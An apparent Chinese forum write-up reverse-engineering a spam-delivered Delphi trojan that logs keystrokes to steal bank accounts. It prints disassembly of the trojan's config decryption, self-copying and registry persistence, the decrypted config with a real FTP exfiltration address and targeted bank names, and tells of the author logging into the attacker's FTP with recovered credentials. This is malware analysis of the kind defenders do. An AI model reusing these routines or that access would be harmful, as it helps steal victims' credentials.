【文章标题】: 一个偷银行帐号木马的简单分析
【文章作者】: CCDebuger
【下载地址】: 自己搜索下载
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
--------------------------------------------------------------------------------
【详细过程】
今天看邮箱,收到一封 刘娜 <mnbppp@163.com> 来的垃圾邮件,内容如下:
您好 我在互联网上看到你们公司发的产品信息
请问向这种的什么价格 可以邮购吗 谢谢回复
里面有个附件“图片.rar”,一看就估计有问题。下载“图片.rar”解压后有个图标为资源浏览器中图片图标的“图片.exe”文件,是个 RAR 自解压文件,解压脚本如下:
;下面的注释包含自解压脚本命令
Path=%systemroot%\temp
SavePath
Setup=book.exe
Presetup=1.jpg
Silent=1
Overwrite=2
直接用 WinRAR 解压,看里面的 book.exe。这个程序不知道加了什么壳,脱的时候看了一下,有好几层壳,不过都是压缩壳,直接 ESP 定律脱之。脱完是个 Delphi 编的程序,看了一下资源,里面的 RCDATA 中有个 INFO 的资源,应该就是加密后的配置文件了。先 IDA 分析一下,这个程序到时比较直接,先解码配置文件,然后复制自身到系统目录运行,再设一些注册表项目,再来监视键盘:
CODE:00433FC0 public start
CODE:00433FC0 start:
CODE:00433FC0 push ebp
CODE:00433FC1 mov ebp, esp
CODE:00433FC3 mov ecx, 6
CODE:00433FC3
CODE:00433FC8
CODE:00433FC8 loc_433FC8: ; CODE XREF: CODE:00433FCDj
CODE:00433FC8 push 0
CODE:00433FCA push 0
CODE:00433FCC dec ecx
CODE:00433FCD jnz short loc_433FC8
CODE:00433FCD
CODE:00433FCF push ecx
CODE:00433FD0 push ebx
CODE:00433FD1 push esi
CODE:00433FD2 mov eax, offset dword_433EF0
CODE:00433FD7 call Sysinit::__linkproc__ InitExe(void *)
CODE:00433FD7
CODE:00433FDC mov esi, offset unk_437A4C
CODE:00433FE1 xor eax, eax
CODE:00433FE3 push ebp
CODE:00433FE4 push offset loc_4341B0
CODE:00433FE9 push dword ptr fs:[eax]
CODE:00433FEC mov fs:[eax], esp
CODE:00433FEF lea edx, [ebp-14h]
CODE:00433FF2 mov eax, 1
CODE:00433FF7 call System::ParamStr(int)
CODE:00433FF7
CODE:00433FFC mov eax, [ebp-14h]
CODE:00433FFF mov edx, offset s->Lanzateactivex ; "/lanzateActiveX"
CODE:00434004 call System::__linkproc__ LStrCmp(void)
CODE:00434004
CODE:00434009 jnz short loc_43403C
CODE:00434009
CODE:0043400B push 0
CODE:0043400D push offset dword_4341D8
CODE:00434012 push offset s->Reactivateactivex_0 ; "/reactivateActiveX"
CODE:00434017 lea edx, [ebp-18h]
CODE:0043401A xor eax, eax
CODE:0043401C call System::ParamStr(int)
CODE:0043401C
CODE:00434021 mov eax, [ebp-18h]
CODE:00434024 call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00434024
CODE:00434029 push eax
CODE:0043402A push 0
CODE:0043402C mov eax, ds:hInstance
CODE:00434031 push eax
CODE:00434032 call ShellExecuteA
CODE:00434032
CODE:00434037 call System::__linkproc__ Halt0(void)
CODE:00434037
CODE:0043403C ; ---------------------------------------------------------------------------
CODE:0043403C
CODE:0043403C loc_43403C: ; CODE XREF: CODE:00434009j
CODE:0043403C lea edx, [ebp-1Ch]
CODE:0043403F mov eax, 1
CODE:00434044 call System::ParamStr(int)
CODE:00434044
CODE:00434049 mov eax, [ebp-1Ch]
CODE:0043404C mov edx, offset s->Lanzaterunonce_0 ; "/lanzateRunOnce"
CODE:00434051 call System::__linkproc__ LStrCmp(void)
CODE:00434051
CODE:00434056 jnz short loc_434089
CODE:00434056
CODE:00434058 push 0
CODE:0043405A push offset dword_4341D8
CODE:0043405F push offset s->Reactivaterunonce_0 ; "/reactivateRunOnce"
CODE:00434064 lea edx, [ebp-20h]
CODE:00434067 xor eax, eax
CODE:00434069 call System::ParamStr(int)
CODE:00434069
CODE:0043406E mov eax, [ebp-20h]
CODE:00434071 call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00434071
CODE:00434076 push eax
CODE:00434077 push 0
CODE:00434079 mov eax, ds:hInstance
CODE:0043407E push eax
CODE:0043407F call ShellExecuteA
CODE:0043407F
CODE:00434084 call System::__linkproc__ Halt0(void)
CODE:00434084
CODE:00434089 ; ---------------------------------------------------------------------------
CODE:00434089
CODE:00434089 loc_434089: ; CODE XREF: CODE:00434056j
CODE:00434089 lea edx, [ebp-24h]
CODE:0043408C mov eax, 1
CODE:00434091 call System::ParamStr(int)
CODE:00434091
CODE:00434096 mov eax, [ebp-24h]
CODE:00434099 mov edx, offset s->Instalando ; "/instalando"
CODE:0043409E call System::__linkproc__ LStrCmp(void)
CODE:0043409E
CODE:004340A3 jz short loc_4340DD
CODE:004340A3
CODE:004340A5 lea edx, [ebp-28h]
CODE:004340A8 mov eax, 1
CODE:004340AD call System::ParamStr(int)
CODE:004340AD
CODE:004340B2 mov eax, [ebp-28h]
CODE:004340B5 mov edx, offset s->Reactivateactivex_1 ; "/reactivateActiveX"
CODE:004340BA call System::__linkproc__ LStrCmp(void)
CODE:004340BA
CODE:004340BF jz short loc_4340DD
CODE:004340BF
CODE:004340C1 lea edx, [ebp-2Ch]
CODE:004340C4 mov eax, 1
CODE:004340C9 call System::ParamStr(int)
CODE:004340C9
CODE:004340CE mov eax, [ebp-2Ch]
CODE:004340D1 mov edx, offset s->Reactivaterunonce_1 ; "/reactivateRunOnce"
CODE:004340D6 call System::__linkproc__ LStrCmp(void)
CODE:004340D6
CODE:004340DB jnz short loc_43411B
CODE:004340DB
CODE:004340DD
CODE:004340DD loc_4340DD: ; CODE XREF: CODE:004340A3j
CODE:004340DD ; CODE:004340BFj
CODE:004340DD lea edx, [ebp-30h]
CODE:004340E0 mov eax, 2
CODE:004340E5 call System::ParamStr(int)
CODE:004340E5
CODE:004340EA mov eax, [ebp-30h]
CODE:004340ED mov edx, offset s->Melt ; "/melt"
CODE:004340F2 call System::__linkproc__ LStrCmp(void)
CODE:004340F2
CODE:004340F7 jnz short loc_43411B
CODE:004340F7
CODE:004340F9 jmp short loc_434102
CODE:004340F9
CODE:004340FB ; ---------------------------------------------------------------------------
CODE:004340FB
CODE:004340FB loc_4340FB: ; CODE XREF: CODE:00434119j
CODE:004340FB push 64h
CODE:004340FD call Sleep
CODE:004340FD
CODE:00434102
CODE:00434102 loc_434102: ; CODE XREF: CODE:004340F9j
CODE:00434102 lea edx, [ebp-34h]
CODE:00434105 mov eax, 3
CODE:0043410A call System::ParamStr(int)
CODE:0043410A
CODE:0043410F mov eax, [ebp-34h]
CODE:00434112 call Sysutils::DeleteFile(System::AnsiString)
CODE:00434112
CODE:00434117 test al, al
CODE:00434119 jz short loc_4340FB
CODE:00434119
CODE:0043411B
CODE:0043411B loc_43411B: ; CODE XREF: CODE:004340DBj
CODE:0043411B ; CODE:004340F7j
CODE:0043411B push offset s->Ik0_1Abcd ; "IK 0.1 abcd"
CODE:00434120 push 0FFFFFFFFh
CODE:00434122 push 0
CODE:00434124 call _Create_Mutex ; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00434124
CODE:00434129 mov ebx, eax
CODE:0043412B call GetLastError
CODE:0043412B
CODE:00434130 cmp eax, ERROR_ALREADY_EXISTS
CODE:00434135 jnz short loc_43413C
CODE:00434135
CODE:00434137 call System::__linkproc__ Halt0(void)
CODE:00434137
CODE:0043413C ; ---------------------------------------------------------------------------
CODE:0043413C
CODE:0043413C loc_43413C: ; CODE XREF: CODE:00434135j
CODE:0043413C call _Read_INFO ; 读取 RCDATA 中 INFO 的内容并解码
CODE:0043413C
CODE:00434141 call _Copy_and_Run ; 复制自身到系统目录并运行
CODE:00434141
CODE:00434146 call _Set_Reg_Info ; 在注册表中设置内容并视情况在系统目录中创建 pschost 目录,
CODE:00434146 ; 复制木马到此目录,并设置注册表项。
CODE:00434146
CODE:0043414B call _Get_KeyBoard ; 监视键盘输入
----------------------------------------------------------------------------------------------------------
一、配置文件的解码
这个木马我最感兴趣的就是看看它的配置如何,来看看解码配置这一段。先看看程序中 INFO 资源原来的数据:
0000h: 35 36 32 38 40 40 40 24 30 79 B9 45 04 BE C4 59 5628@@@$0y笶.灸Y
0010h: 65 36 E1 2B DC 34 46 CF CB 28 DB EA 80 D9 93 38 e6??F纤(坳€贀8
0020h: 55 49 B6 97 F8 19 B8 0A 02 2F 39 CE 2B AB C7 3C UI稐??./9?<
0030h: 61 39 84 8F 35 1C 7E F5 57 60 A4 B4 C2 0C 75 92 a9剰5.~鮓`ご?u?
0040h: 71 6A 9F 54 1E 76 21 A0 7F 43 FC A0 B6 07 B6 DD qj烼.v!?C鼱?遁
0050h: D7 F9 A5 1D 4D 19 25 61 49 C6 14 02 52 FD 60 A3 座?M.%aI?.R齚?
0060h: 8A 3C ED 90 FF 0F 0D D7 03 EB E7 98 48 16 1A B6 ?韾..?腌楬..?
0070h: 28 12 7C BB 9B AB 70 87 28 73 B5 3B 92 81 BE 7D (.|粵玴?s?拋緘
0080h: DF 86 BA 7F F8 40 9F FA 9D BB 17 87 98 E6 2C D5 邌?鳣燏澔.嚇??
0090h: 28 94 F1 4B 21 39 72 BC E9 99 F6 AE ED 4F C5 DB (旕K!9r奸欥O袍
00A0h: 41 C8 A0 55 2A D9 BD 0D 16 04 0A 13 8F 0F 36 AC A葼U*俳.....?6?
00B0h: F8 99 E4 FD F7 62 5D 21 4E CF B1 B3 4E D9 0F 7E 鴻潺鱞]!N媳砃?~
00C0h: 69 D6 D5 82 42 ED C6 A7 A5 FF 23 CD 49 5E ED 42 i终侭砥Д#虸^鞡
00D0h: 29 98 DE B6 F4 E6 D8 36 9B 22 A5 5B 63 81 50 9C )樲遏尕6?c丳?
00E0h: 5E 7C 2D 15 49 0A 17 3B 4C C4 F1 BB DA 78 61 4B ^|-.I..;L鸟悔xaK
00F0h: 57 20 50 95 4C 06 8C 0F EC ED 50 FA F0 61 9C 88 W P昄.?祉Pa湀
0100h: 24 73 05 15 CE 26 DA E6 AD BF A4 94 6F 8E 95 29 $s..?阪o帟)
0110h: 2C 1A A1 01 DD 8C F5 C7 4D 21 16 C7 EC 8C C7 56 ,.?輰跚M!.庆屒V
0120h: 83 58 92 42 D7 10 30 8C FA F5 60 06 41 50 3D 4C 僗払?0岤鮜.AP=L
0130h: A2 4B FF 15 C4 11 DA E5 0E EC 4C 6E 6D B6 F7 B2 .?阱.霯nm恩?
0140h: EE D5 DB 46 26 F7 52 DC 31 ED 64 61 B2 AF B3 80 钫跢&鱎?韉a帛硛
0150h: CA 81 EB 95 D0 2E 34 ED AF F1 94 DC E4 06 31 82 蕘霑?4懑駭茕.1?
0160h: 6F 47 55 78 30 7D 50 6E FA 4B 8B 99 39 75 9B 76 oGUx0}Pn鶮嫏9u泇
0170h: AA 7A B0 58 8A 45 E3 01 B3 06 B7 20 30 28 87 CE 獄癤奅???0(囄
0180h: 28 33 5E 20 1C 9A 15 FB B8 B1 A1 38 5E 18 0D C7 (3^ .?薄8^..?
0190h: 66 B2 3D 57 CE D3 3D 3C 68 B7 99 5D F3 8D F8 2F f?W斡=<h窓]髰?
01A0h: D2 41 AC 71 FD 1B 88 3B 9E 6F D4 E7 C2 E6 13 7A 褹琿??瀘早骆.z
01B0h: 75 41 03 F2 7F 69 76 89 60 D8 B5 BD EC EF BA 07 uA.?iv塦氐届锖.
01C0h: BE 42 77 B2 95 EB 74 8C BC A6 3B 40 18 29 4E 4D 綛w矔雝尲?@.)NM
01D0h: D1 C2 2E EE D9 92 09 69 2C C4 CE FE 3F 29 FB 38 崖.钯?i,奈?)?
01E0h: 04 6C 75 6E 4D 8C D3 7C E7 95 17 1D 93 21 2B 7B .lunM層|鐣..?+{
01F0h: C5 62 00 舃.
现在看看解码配置的代码:
CODE:00433990 _Read_INFO proc near ; CODE XREF: CODE:loc_43413Cp
CODE:00433990
CODE:00433990 var_18 = dword ptr -18h
CODE:00433990 var_14 = dword ptr -14h
CODE:00433990 var_10 = dword ptr -10h
CODE:00433990 var_C = dword ptr -0Ch
CODE:00433990 var_8 = dword ptr -8
CODE:00433990 var_4 = dword ptr -4
CODE:00433990
CODE:00433990 push ebp
CODE:00433991 mov ebp, esp
CODE:00433993 xor ecx, ecx
CODE:00433995 push ecx
CODE:00433996 push ecx
CODE:00433997 push ecx
CODE:00433998 push ecx
CODE:00433999 push ecx
CODE:0043399A push ecx
CODE:0043399B push ebx
CODE:0043399C push esi
CODE:0043399D push edi
CODE:0043399E xor eax, eax
CODE:004339A0 push ebp
CODE:004339A1 push offset loc_433E8E
CODE:004339A6 push dword ptr fs:[eax]
CODE:004339A9 mov fs:[eax], esp
CODE:004339AC push 0Ah ; lpType
CODE:004339AE push offset s->Info ; "INFO"
CODE:004339B3 mov eax, ds:hInstance
CODE:004339B8 push eax ; hModule
CODE:004339B9 call FindResourceA
CODE:004339B9
CODE:004339BE mov ebx, eax
CODE:004339C0 push ebx ; hResInfo
CODE:004339C1 mov eax, ds:hInstance
CODE:004339C6 push eax ; hModule
CODE:004339C7 call SizeofResource
CODE:004339C7
CODE:004339CC mov esi, eax
CODE:004339CE push ebx ; hResInfo
CODE:004339CF mov eax, ds:hInstance
CODE:004339D4 push eax ; hModule
CODE:004339D5 call LoadResource
CODE:004339D5
CODE:004339DA mov ebx, eax
CODE:004339DC push ebx ; hResData
CODE:004339DD call LockResource
CODE:004339DD
CODE:004339E2 mov edi, eax
CODE:004339E4 test edi, edi
CODE:004339E6 jnz short loc_4339ED
CODE:004339E6
CODE:004339E8 call System::__linkproc__ Halt0(void)
CODE:004339E8
CODE:004339ED ; ---------------------------------------------------------------------------
CODE:004339ED
CODE:004339ED loc_4339ED: ; CODE XREF: _Read_INFO+56j
CODE:004339ED mov edx, esi
CODE:004339EF dec edx
CODE:004339F0 lea eax, [ebp+var_4]
CODE:004339F3 call System::__linkproc__ LStrSetLength(void)
CODE:004339F3
CODE:004339F8 lea eax, [ebp+var_4]
CODE:004339FB call j_unknown_libname_64
CODE:004339FB
CODE:00433A00 mov ecx, esi
CODE:00433A02 mov edx, edi
CODE:00433A04 call _Move_Data
CODE:00433A04
CODE:00433A09 push ebx ; hResData
CODE:00433A0A call FreeResource
CODE:00433A0A
CODE:00433A0F lea eax, [ebp+var_C]
CODE:00433A12 push eax
CODE:00433A13 mov edx, [ebp+var_4]
CODE:00433A16 mov eax, offset off_433EAC
CODE:00433A1B call _Cmp_Str_by_Len ; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00433A1B
CODE:00433A20 mov ecx, eax
CODE:00433A22 dec ecx
CODE:00433A23 mov edx, 1
CODE:00433A28 mov eax, [ebp+var_4]
CODE:00433A2B call System::__linkproc__ LStrCopy(void)
CODE:00433A2B
CODE:00433A30 mov eax, [ebp+var_C]
CODE:00433A33 call Sysutils::StrToInt(System::AnsiString)
CODE:00433A33
CODE:00433A38 mov ebx, eax
CODE:00433A3A lea eax, [ebp+var_4]
CODE:00433A3D push eax
CODE:00433A3E mov edx, [ebp+var_4]
CODE:00433A41 mov eax, offset off_433EAC
CODE:00433A46 call _Cmp_Str_by_Len ; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00433A46
CODE:00433A4B push eax
CODE:00433A4C mov eax, [ebp+var_4]
CODE:00433A4F call _Get_StrLen
CODE:00433A4F
CODE:00433A54 pop edx
CODE:00433A55 sub eax, edx
CODE:00433A57 add eax, 3
CODE:00433A5A push eax
CODE:00433A5B mov edx, [ebp+var_4]
CODE:00433A5E mov eax, offset off_433EAC
CODE:00433A63 call _Cmp_Str_by_Len ; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00433A63
CODE:00433A68 mov edx, eax
CODE:00433A6A add edx, 3
CODE:00433A6D mov eax, [ebp+var_4]
CODE:00433A70 pop ecx
CODE:00433A71 call System::__linkproc__ LStrCopy(void)
CODE:00433A71
CODE:00433A76 lea ecx, [ebp+var_10]
CODE:00433A79 mov edx, ebx
CODE:00433A7B mov eax, [ebp+var_4]
CODE:00433A7E call _Decrypt_INFO ; 这里面对 INFO 中的数据进行解码
CODE:00433A7E
CODE:00433A83 mov edx, [ebp+var_10] ; 程序中的INFO资源解码后的结果地址送EDX
CODE:00433A86 lea eax, [ebp+var_4]
CODE:00433A89 call System::__linkproc__ LStrLAsg(void *,void *)
CODE:00433A89
CODE:00433A8E mov ebx, 1
CODE:00433A8E
CODE:00433A93
CODE:00433A93 loc_433A93: ; CODE XREF: _Read_INFO+4DDj
----------------------------------------------------------------------------------------------------------
解码算法:
CODE:00414834 loc_414834: ; CODE XREF: _Decrypt_INFO+69j
CODE:00414834 mov eax, [esp+18h+var_18]
CODE:00414837 call _Read_Str
CODE:00414837
CODE:0041483C movzx edi, bx ; 下面这一段就是解码算法
CODE:0041483F mov dl, [ebp+edi-1]
CODE:00414843 movzx ecx, si
CODE:00414846 shr ecx, 8
CODE:00414849 xor dl, cl
CODE:0041484B mov [eax+edi-1], dl
CODE:0041484F xor eax, eax
CODE:00414851 mov al, [ebp+edi-1]
CODE:00414855 add si, ax
CODE:00414858 imul ax, si, 0BC17h
CODE:0041485D add ax, 0F386h
CODE:00414861 mov esi, eax
CODE:00414863 inc ebx
CODE:00414864 dec [esp+18h+var_14]
CODE:00414869 jnz short loc_414834
让加密的配置文件在 OD 中动态跑一下,利用程序自身来解出配置文件。加密数据中开始的那个“5628”是不参加解码的。整理后如下(为安全计,隐去 FTP 用户名和密码。//后面是我加的注释):
1
125.64.24.60 //FTP 的 IP 地址
2** //FTP 用户名?
1** //FTP 密码?
21 //FTP 端口
/IKLogs/%UserName%/
0
0
0
1
%Windir%\RSTray.exe //系统的 Windows 目录下创建木马文件
1
010000
svchost //设置注册表中的自动运行项
SCISound
{4fz8rk-15aq-16nc-23or4-2ke0fa051515}
pschost
1
中国建设银行|||广东发展银行|||中国民生银行|||中国邮政支付网关|||网付通支付网关|||广州市商业银行|||顺德信用社|||信社e-bank|||兴业银行|||深圳平安银行|||在线兴业|||平安个人网上银行|||宁波银行|||信用合作联社|||支付页面|||客户交易结果信息显示|||
1000
800
50
1
SOFTWARE\Microsoft\Cryptography\RNG\
1
根据上面弄出来的东西,应该是个偷银行帐号的马,估计和 IKlogger 这个软件有关。用得出来的 FTP 地址和用户名、密码,连了一下,里面有个 iklogs 目录,再按监测到各个电脑的用户名分类建立目录,各用户名目录下分别生成 clickshots 和 logs 目录,这个 logs 目录下面按时间生成的文本文件就是键盘记录了。
----------------------------------------------------------------------------------------------------------
二、复制自身并运行
CODE:004332C4 _Copy_and_Run proc near ; CODE XREF: CODE:00434141p
CODE:004332C4
CODE:004332C4 var_1C = dword ptr -1Ch
CODE:004332C4 var_18 = dword ptr -18h
CODE:004332C4 var_14 = dword ptr -14h
CODE:004332C4 var_10 = dword ptr -10h
CODE:004332C4 var_C = dword ptr -0Ch
CODE:004332C4 var_8 = dword ptr -8
CODE:004332C4 var_4 = dword ptr -4
CODE:004332C4
CODE:004332C4 push ebp
CODE:004332C5 mov ebp, esp
CODE:004332C7 xor ecx, ecx
CODE:004332C9 push ecx
CODE:004332CA push ecx
CODE:004332CB push ecx
CODE:004332CC push ecx
CODE:004332CD push ecx
CODE:004332CE push ecx
CODE:004332CF push ecx
CODE:004332D0 xor eax, eax
CODE:004332D2 push ebp
CODE:004332D3 push offset loc_43340F
CODE:004332D8 push dword ptr fs:[eax]
CODE:004332DB mov fs:[eax], esp
CODE:004332DE lea edx, [ebp+var_4]
CODE:004332E1 mov eax, ds:off_4361BC
CODE:004332E6 mov eax, [eax]
CODE:004332E8 call _Envionment_Var_To_Real_Value ; 把环境变量转换为实际的系统路径
CODE:004332E8
CODE:004332ED mov edx, [ebp+var_4]
CODE:004332F0 mov eax, ds:off_4361BC
CODE:004332F5 call System::__linkproc__ LStrAsg(void *,void *)
CODE:004332F5
CODE:004332FA lea edx, [ebp+var_8]
CODE:004332FD mov eax, ds:off_4360FC
CODE:00433302 mov eax, [eax]
CODE:00433304 call _Envionment_Var_To_Real_Value
CODE:00433304
CODE:00433309 mov edx, [ebp+var_8]
CODE:0043330C mov eax, ds:off_4360FC
CODE:00433311 call System::__linkproc__ LStrAsg(void *,void *)
CODE:00433311
CODE:00433316 lea edx, [ebp+var_C]
CODE:00433319 xor eax, eax
CODE:0043331B call System::ParamStr(int)
CODE:0043331B
CODE:00433320 mov eax, [ebp+var_C]
CODE:00433323 mov edx, ds:off_4361BC
CODE:00433329 mov edx, [edx]
CODE:0043332B call System::__linkproc__ LStrCmp(void)
CODE:0043332B
CODE:00433330 jz loc_4333F4
CODE:00433330
CODE:00433336 push 0 ; bFailIfExists
CODE:00433338 mov eax, ds:off_4361BC
CODE:0043333D mov eax, [eax]
CODE:0043333F call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:0043333F
CODE:00433344 push eax ; lpNewFileName
CODE:00433345 lea edx, [ebp+var_10]
CODE:00433348 xor eax, eax
CODE:0043334A call System::ParamStr(int)
CODE:0043334A
CODE:0043334F mov eax, [ebp+var_10]
CODE:00433352 call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00433352
CODE:00433357 push eax ; lpExistingFileName
CODE:00433358 call CopyFileA ; 把木马复制到 Windows 目录,根据解码后的配置文件,改名为 RSTray.exe
CODE:00433358
CODE:0043335D mov eax, ds:off_436188
CODE:00433362 cmp byte ptr [eax], 1
CODE:00433365 jnz short loc_4333C9
CODE:00433365
CODE:00433367 push 0 ; nShowCmd
CODE:00433369 push offset Directory ; lpDirectory
CODE:0043336E push offset s->InstalandoMelt ; "/instalando /melt \""
CODE:00433373 lea edx, [ebp+var_1C]
CODE:00433376 xor eax, eax
CODE:00433378 call System::ParamStr(int)
CODE:00433378
CODE:0043337D mov eax, [ebp+var_1C]
CODE:00433380 call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00433380
CODE:00433385 mov edx, eax
CODE:00433387 lea eax, [ebp+var_18]
CODE:0043338A call _Get_String_Len ; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:0043338A
CODE:0043338F push [ebp+var_18]
CODE:00433392 push offset dword_433444
CODE:00433397 lea eax, [ebp+var_14]
CODE:0043339A mov edx, 3
CODE:0043339F call System::__linkproc__ LStrCatN(void)
CODE:0043339F
CODE:004333A4 mov eax, [ebp+var_14]
CODE:004333A7 call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:004333A7
CODE:004333AC push eax ; lpParameters
CODE:004333AD mov eax, ds:off_4361BC
CODE:004333B2 mov eax, [eax]
CODE:004333B4 call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:004333B4
CODE:004333B9 push eax ; lpFile
CODE:004333BA push 0 ; lpOperation
CODE:004333BC mov eax, ds:hInstance
CODE:004333C1 push eax ; hwnd
CODE:004333C2 call ShellExecuteA ; 加上面的 /instalando /melt 参数运行木马
CODE:004333C2
CODE:004333C7 jmp short loc_4333EF
CODE:004333C7
CODE:004333C9 ; ---------------------------------------------------------------------------
CODE:004333C9
CODE:004333C9 loc_4333C9: ; CODE XREF: _Copy_and_Run+A1j
CODE:004333C9 push 0 ; nShowCmd
CODE:004333CB push offset Directory ; lpDirectory
CODE:004333D0 push offset Parameters ; "/instalando"
CODE:004333D5 mov eax, ds:off_4361BC
CODE:004333DA mov eax, [eax]
CODE:004333DC call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:004333DC
CODE:004333E1 push eax ; lpFile
CODE:004333E2 push 0 ; lpOperation
CODE:004333E4 mov eax, ds:hInstance
CODE:004333E9 push eax ; hwnd
CODE:004333EA call ShellExecuteA
CODE:004333EA
CODE:004333EF
CODE:004333EF loc_4333EF: ; CODE XREF: _Copy_and_Run+103j
CODE:004333EF call System::__linkproc__ Halt0(void)
CODE:004333EF
CODE:004333F4 ; ---------------------------------------------------------------------------
CODE:004333F4
CODE:004333F4 loc_4333F4: ; CODE XREF: _Copy_and_Run+6Cj
CODE:004333F4 xor eax, eax
CODE:004333F6 pop edx
CODE:004333F7 pop ecx
CODE:004333F8 pop ecx
CODE:004333F9 mov fs:[eax], edx
CODE:004333FC push offset loc_433416
CODE:004333FC
CODE:00433401
CODE:00433401 loc_433401: ; CODE XREF: _Copy_and_Run+150j
CODE:00433401 lea eax, [ebp+var_1C]
CODE:00433404 mov edx, 7
CODE:00433409 call System::__linkproc__ LStrArrayClr(void *,int)
CODE:00433409
CODE:0043340E retn
CODE:0043340E
CODE:0043340F ; ---------------------------------------------------------------------------
CODE:0043340F
CODE:0043340F loc_43340F: ; DATA XREF: _Copy_and_Run+Fo
CODE:0043340F jmp unknown_libname_48 ; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:0043340F
CODE:00433414 ; ---------------------------------------------------------------------------
CODE:00433414 jmp short loc_433401
CODE:00433414
CODE:00433416 ; ---------------------------------------------------------------------------
CODE:00433416
CODE:00433416 loc_433416: ; CODE XREF: _Copy_and_Run+14Aj
CODE:00433416 ; DATA XREF: _Copy_and_Run+138o
CODE:00433416 mov esp, ebp
CODE:00433418 pop ebp
CODE:00433419 retn
CODE:00433419
CODE:00433419 _Copy_and_Run endp
以上为文件复制部分的代码,这里我不详细讲了,只给出结果:
木马在系统的 Windows 目录下复制自身,并命名为 RSTray.exe,带参数 /instalando /melt 运行。
----------------------------------------------------------------------------------------------------------
三、注册表的设置
CODE:0043375C _Set_Reg_Info proc near ; CODE XREF: CODE:00434146p
CODE:0043375C
CODE:0043375C var_14 = dword ptr -14h
CODE:0043375C var_10 = dword ptr -10h
CODE:0043375C var_C = dword ptr -0Ch
CODE:0043375C var_8 = dword ptr -8
CODE:0043375C var_4 = dword ptr -4
CODE:0043375C
CODE:0043375C push ebp
CODE:0043375D mov ebp, esp
CODE:0043375F xor ecx, ecx
CODE:00433761 push ecx
CODE:00433762 push ecx
CODE:00433763 push ecx
CODE:00433764 push ecx
CODE:00433765 push ecx
CODE:00433766 push ebx
CODE:00433767 mov ebx, ds:off_436284
CODE:0043376D xor eax, eax
CODE:0043376F push ebp
CODE:00433770 push offset loc_43388C
CODE:00433775 push dword ptr fs:[eax]
CODE:00433778 mov fs:[eax], esp
CODE:0043377B lea edx, [ebp+var_4]
CODE:0043377E mov eax, 1
CODE:00433783 call System::ParamStr(int)
CODE:00433783
CODE:00433788 mov eax, [ebp+var_4]
CODE:0043378B mov edx, offset s->Reactivateactivex ; "/reactivateActiveX"
CODE:00433790 call System::__linkproc__ LStrCmp(void)
CODE:00433790
CODE:00433795 jnz short loc_4337B9
CODE:00433795
CODE:00433797 mov ecx, ds:off_4360F0
CODE:0043379D mov ecx, [ecx]
CODE:0043379F lea eax, [ebp+var_8]
CODE:004337A2 mov edx, offset s->SoftwareMicrosoftActiveSetupInstalledComponents_0 ; "SOFTWARE\\Microsoft\\Active Setup\\Install"...
CODE:004337A7 call System::__linkproc__ LStrCat3(void)
CODE:004337A7
CODE:004337AC mov edx, [ebp+var_8]
CODE:004337AF mov eax, HKEY_CURRENT_USER
CODE:004337B4 call _Delete_RegKey
CODE:004337B4
CODE:004337B9
CODE:004337B9 loc_4337B9: ; CODE XREF: _Set_Reg_Info+39j
CODE:004337B9 lea edx, [ebp+var_C]
CODE:004337BC mov eax, 1
CODE:004337C1 call System::ParamStr(int)
CODE:004337C1
CODE:004337C6 mov eax, [ebp+var_C]
CODE:004337C9 mov edx, offset s->Reactivaterunonce ; "/reactivateRunOnce"
CODE:004337CE call System::__linkproc__ LStrCmp(void)
CODE:004337CE
CODE:004337D3 jnz short loc_433814
CODE:004337D3
CODE:004337D5 push offset dword_433918
CODE:004337DA lea edx, [ebp+var_14]
CODE:004337DD xor eax, eax
CODE:004337DF call System::ParamStr(int)
CODE:004337DF
CODE:004337E4 push [ebp+var_14]
CODE:004337E7 push offset dword_433918
CODE:004337EC lea eax, [ebp+var_10]
CODE:004337EF mov edx, 3
CODE:004337F4 call System::__linkproc__ LStrCatN(void)
CODE:004337F4
CODE:004337F9 mov eax, [ebp+var_10]
CODE:004337FC push eax
CODE:004337FD mov ecx, ds:off_436270
CODE:00433803 mov ecx, [ecx]
CODE:00433805 mov edx, offset s->SoftwareMicrosoftWindowsCurrentversionRunonce_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
CODE:0043380A mov eax, HKEY_LOCAL_MACHINE
CODE:0043380F call _Create_RegKey
CODE:0043380F
CODE:00433814
CODE:00433814 loc_433814: ; CODE XREF: _Set_Reg_Info+77j
CODE:00433814 cmp byte ptr [ebx], 1
CODE:00433817 jnz short loc_433825
CODE:00433817
CODE:00433819 mov eax, ds:off_4361AC ; 解码后配置文件的相关内容地址送EAX
CODE:0043381E mov eax, [eax] ; 获取解码后配置文件的相关内容,这里是 svchost
CODE:00433820 call _Create_Run_RegKey
CODE:00433820
CODE:00433825
CODE:00433825 loc_433825: ; CODE XREF: _Set_Reg_Info+BBj
CODE:00433825 cmp byte ptr [ebx+1], 1
CODE:00433829 jnz short loc_433837
CODE:00433829
CODE:0043382B mov eax, ds:off_436270
CODE:00433830 mov eax, [eax]
CODE:00433832 call _Create_RunOnce_RegKey
CODE:00433832
CODE:00433837
CODE:00433837 loc_433837: ; CODE XREF: _Set_Reg_Info+CDj
CODE:00433837 cmp byte ptr [ebx+2], 1
CODE:0043383B jnz short loc_433849
CODE:0043383B
CODE:0043383D mov eax, ds:off_4360F0
CODE:00433842 mov eax, [eax] ; 解码后配置文件中的“{4fz8rk-15aq-16nc-23or4-2ke0fa051515}”字串送EAX
CODE:00433844 call _Create_Component_RegKey
CODE:00433844
CODE:00433849
CODE:00433849 loc_433849: ; CODE XREF: _Set_Reg_Info+DFj
CODE:00433849 cmp byte ptr [ebx+3], 1
CODE:0043384D jnz short loc_43385B
CODE:0043384D
CODE:0043384F mov eax, ds:off_436044
CODE:00433854 mov eax, [eax] ; 这里为解码后配置文件中的字串 pschost
